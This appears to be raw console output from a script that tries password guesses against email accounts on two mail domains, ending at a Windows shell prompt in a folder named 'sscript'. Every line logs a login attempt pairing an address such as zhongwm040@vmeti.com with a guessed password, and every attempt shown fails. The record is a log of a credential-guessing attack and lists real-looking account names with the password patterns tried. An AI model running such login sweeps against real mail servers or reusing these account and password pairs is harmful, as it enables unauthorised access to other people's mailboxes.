[+] checking 'zhongwm037@vmeti.com' 'zhongwm730' 'vmeti.com'
[!] chekcing zhongwm037@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm039@vmeti.com' 'zhongwm930' 'vmeti.com'
[!] chekcing zhongwm039@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm040@vmeti.com' 'sootoo400' 'vmeti.com'
[!] chekcing zhongwm040@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm041@vmeti.com' 'sutu041' 'vmeti.com'
[!] chekcing zhongwm041@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm042@vmeti.com' 'sootoo242' 'vmeti.com'
[!] chekcing zhongwm042@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm043@vmeti.com' 'zhongwm0352' 'vmeti.com'
[!] chekcing zhongwm043@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm044@vmeti.com' 'sootoo4478' 'vmeti.com'
[!] chekcing zhongwm044@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm045@vmeti.com' 'sutu4521' 'vmeti.com'
[!] chekcing zhongwm045@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm047@vmeti.com' 'sootoo4712' 'vmeti.com'
[!] chekcing zhongwm047@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm048@vmeti.com' 'sutu6578' 'vmeti.com'
[!] chekcing zhongwm048@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm049@vmeti.com' 'sootoo1547' 'vmeti.com'
[!] chekcing zhongwm049@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm100@sootoo.com' 'sutu5897' 'mail.sootoo.com'
[!] chekcing zhongwm100@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm099@sootoo.com' 'zhongwm1564' 'mail.sootoo.com'
[!] chekcing zhongwm099@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm098@sootoo.com' 'sutu5469' 'mail.sootoo.com'
[!] chekcing zhongwm098@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm097@sootoo.com' 'sootoo1689' 'mail.sootoo.com'
[!] chekcing zhongwm097@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm096@sootoo.com' 'zhongwm6984' 'mail.sootoo.com'
[!] chekcing zhongwm096@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm095@sootoo.com' 'wangzd2587' 'mail.sootoo.com'
[!] chekcing zhongwm095@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm094@sootoo.com' 'zhongwm5687' 'mail.sootoo.com'
[!] chekcing zhongwm094@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm093@sootoo.com' 'sootoo6957' 'mail.sootoo.com'
[!] chekcing zhongwm093@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm092@sootoo.com' 'sutu6987' 'mail.sootoo.com'
[!] chekcing zhongwm092@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm091@sootoo.com' 'zhongwm2487' 'mail.sootoo.com'
[!] chekcing zhongwm091@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm090@sootoo.com' 'sootoo3695' 'mail.sootoo.com'
[!] chekcing zhongwm090@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm089@sootoo.com' 'sutu2548' 'mail.sootoo.com'
[!] chekcing zhongwm089@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm088@sootoo.com' 'sootoo1497' 'mail.sootoo.com'
[!] chekcing zhongwm088@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm087@sootoo.com' 'zhongwm6532' 'mail.sootoo.com'
[!] chekcing zhongwm087@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm086@sootoo.com' 'sootoo2357' 'mail.sootoo.com'
[!] chekcing zhongwm086@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm085@sootoo.com' 'sutu1852' 'mail.sootoo.com'
[!] chekcing zhongwm085@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm084@sootoo.com' 'sootoo1367' 'mail.sootoo.com'
[!] chekcing zhongwm084@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm083@sootoo.com' 'zhongwm3657' 'mail.sootoo.com'
[!] chekcing zhongwm083@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm082@sootoo.com' 'sutu5789' 'mail.sootoo.com'
[!] chekcing zhongwm082@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm081@sootoo.com' 'sootoo1258' 'mail.sootoo.com'
[!] chekcing zhongwm081@sootoo.com failed, reason:-ERR Unable to log on
[+] checking 'zhongwm101@vmeti.com' 'sutu2587' 'vmeti.com'
[!] chekcing zhongwm101@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm102@vmeti.com' 'sootoo1235' 'vmeti.com'
[!] chekcing zhongwm102@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm103@vmeti.com' 'sutu2589' 'vmeti.com'
[!] chekcing zhongwm103@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm104@vmeti.com' 'sutu2590' 'vmeti.com'
[!] chekcing zhongwm104@vmeti.com failed, reason:-ERR Authentication failed.
[+] checking 'zhongwm105@vmeti.com' 'zhongwm2658' 'vmeti.com'
[!] chekcing zhongwm105@vmeti.com failed, reason:-ERR Authentication failed.

D:\work\gitdir\sscript (master)
λ